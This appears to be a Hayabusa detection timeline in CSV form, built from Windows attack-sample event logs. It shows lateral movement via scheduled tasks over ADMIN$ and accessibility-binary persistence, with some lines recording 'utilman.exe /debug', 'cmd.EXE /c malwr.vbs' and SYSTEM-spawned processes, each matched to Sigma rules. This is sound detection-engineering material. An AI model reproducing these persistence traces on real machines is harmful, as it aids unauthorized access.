2019-03-19 09:02:04.351 +09:00,WIN-77LTAPHIQ1R.example.corp,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/temp_scheduled_task_4698_4699.evtx
2019-03-19 09:02:04.351 +09:00,WIN-77LTAPHIQ1R.example.corp,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.367 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: Administrator  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.398 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: Temp\CYAlyNSS.tmp  :  IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.398 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: Temp\CYAlyNSS.tmp  :  IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:07.430 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: Administrator  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:07.445 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: Temp\CYAlyNSS.tmp  :  IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:07.508 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: Administrator  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:07.523 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: Temp\CYAlyNSS.tmp  :  IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:16.835 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: Administrator  :  Workstation WIN-77LTAPHIQ1R  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:17.117 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:17.117 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:21.929 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$  :  Workstation:   :  IP Address: fe80::79bf:8ee2:433c:2567  :  Port: 56034  :  LogonID: 0x18423d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-20 02:22:24.761 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\osk.exe""   :  Path: C:\Windows\System32\osk.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 02:22:24.851 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug  :  Path: C:\Windows\System32\Utilman.exe  :  User: EXAMPLE\user01  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 02:22:24.901 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe""   :  Path: C:\Windows\System32\osk.exe  :  User: EXAMPLE\user01  :  Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 02:22:40.373 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug  :  Path: C:\Windows\System32\Utilman.exe  :  User: EXAMPLE\user01  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 02:26:03.585 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224  :  Path: C:\Windows\System32\UI0Detect.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 02:26:05.628 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding  :  Path: C:\Windows\System32\slui.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 02:31:03.687 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224  :  Path: C:\Windows\System32\UI0Detect.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 02:36:03.788 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224  :  Path: C:\Windows\System32\UI0Detect.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 02:41:03.890 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224  :  Path: C:\Windows\System32\UI0Detect.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 02:41:08.777 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0  :  Path: C:\Windows\System32\LogonUI.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 02:41:08.967 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\cmd.EXE /c malwr.vbs  :  Path: C:\Windows\System32\cmd.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 02:41:08.977 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Logoff  :  Path: C:\Windows\System32\gpscript.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 02:41:09.828 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x1  :  Path: C:\Windows\System32\LogonUI.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: wininit.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 02:42:05.859 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe C:\Windows\system32\CompatTelRunner.exe   :  Path: C:\Windows\System32\taskhost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:11.238 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c   :  Path: C:\Windows\System32\smss.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:11.458 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16  :  Path: C:\Windows\System32\csrss.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:11.699 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000001 0000003c   :  Path: C:\Windows\System32\smss.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:11.719 +09:00,PC01.example.corp,1,informational,Process Creation,Command: wininit.exe  :  Path: C:\Windows\System32\wininit.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:11.759 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16  :  Path: C:\Windows\System32\csrss.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe 00000001 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:11.909 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\services.exe  :  Path: C:\Windows\System32\services.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:11.909 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\lsass.exe  :  Path: C:\Windows\System32\lsass.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:11.919 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\lsm.exe  :  Path: C:\Windows\System32\lsm.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:11.929 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe  :  Path: C:\Windows\System32\winlogon.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe 00000001 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:12.931 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k DcomLaunch  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:13.151 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\VBoxService.exe  :  Path: C:\Windows\System32\VBoxService.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:13.181 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0  :  Path: C:\Windows\System32\LogonUI.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:13.221 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:14.232 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k GPSvcGroup  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:14.603 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\spoolsv.exe  :  Path: C:\Windows\System32\spoolsv.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:14.933 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:14.933 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.094 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Startup  :  Path: C:\Windows\System32\gpscript.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,informational,Process Creation,Command: cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,informational,Process Creation,Command: cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.154 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.154 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.424 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\freeSSHd\FreeSSHDService.exe""  :  Path: C:\Program Files\freeSSHd\FreeSSHDService.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.424 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.424 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.514 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.514 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.795 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.795 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.835 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.835 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.865 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe $(Arg0)  :  Path: C:\Windows\System32\taskhost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.885 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.885 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.915 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.915 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.995 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.995 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:16.065 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\Sysmon.exe  :  Path: C:\Windows\Sysmon.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:16.135 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:16.135 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:16.406 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:16.406 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:16.436 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wlms\wlms.exe  :  Path: C:\Windows\System32\wlms\wlms.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
